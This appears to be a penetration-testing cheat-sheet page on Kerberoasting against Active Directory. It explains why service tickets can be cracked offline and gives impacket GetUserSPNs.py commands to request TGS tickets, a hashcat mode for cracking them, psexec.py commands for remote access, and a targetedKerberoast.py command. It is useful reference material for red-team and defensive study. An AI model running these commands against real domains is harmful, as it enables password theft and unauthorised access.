TerminalCode

Kerberoasting

In the second phase of Kerberos, the client requests the TGS from the KDC to access a resource of a Service Principal Name (SPN). No authorization checks, permissions, etc. are applied, as this is done by the SPN when it receives the TGS. This means that the attacker can request the TGS for a given SPN and then crack it offline to obtain the SPN password.

NOTE: If the SPN is running in the context of a computer account, a managed service account, or a group-managed service account, the password will be randomly generated, complex, and 120 characters long, making it impossible to crack. For this reason, you should focus on SPNs running in the context of user accounts.

Attack

Linux

impacket-GetUserSPNs will attempt to list and get the TGS for the logged in account's SPNs. You must have the credentials of a domain user to perform the extraction.

Synchronize time with domain controller with ntpdate or rdate.

sudo ntpdate <IP_DC>

Listing SPN Accounts

GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]>

Pull all TGS tickets

GetUserSPNs.py -request -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]

Get TGS ticket for a specific account

GetUserSPNs.py -request-user <NAME> -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]

Offline cracking of output with hashcat (-m 13100)

Connect 

psexec.py <DOMAIN>/<USER>@<IP>
psexec.py <DOMAIN>/<USER>@<MACHINE_NAME>.<DOMAIN> -target-ip <MACHINE_IP>

Targeted Kerberoasting

This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target. The attacker can add an SPN (ServicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting.

With targetedKerberoast.py

targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN> --dc-ip <IP>

Last updated

Was this helpful?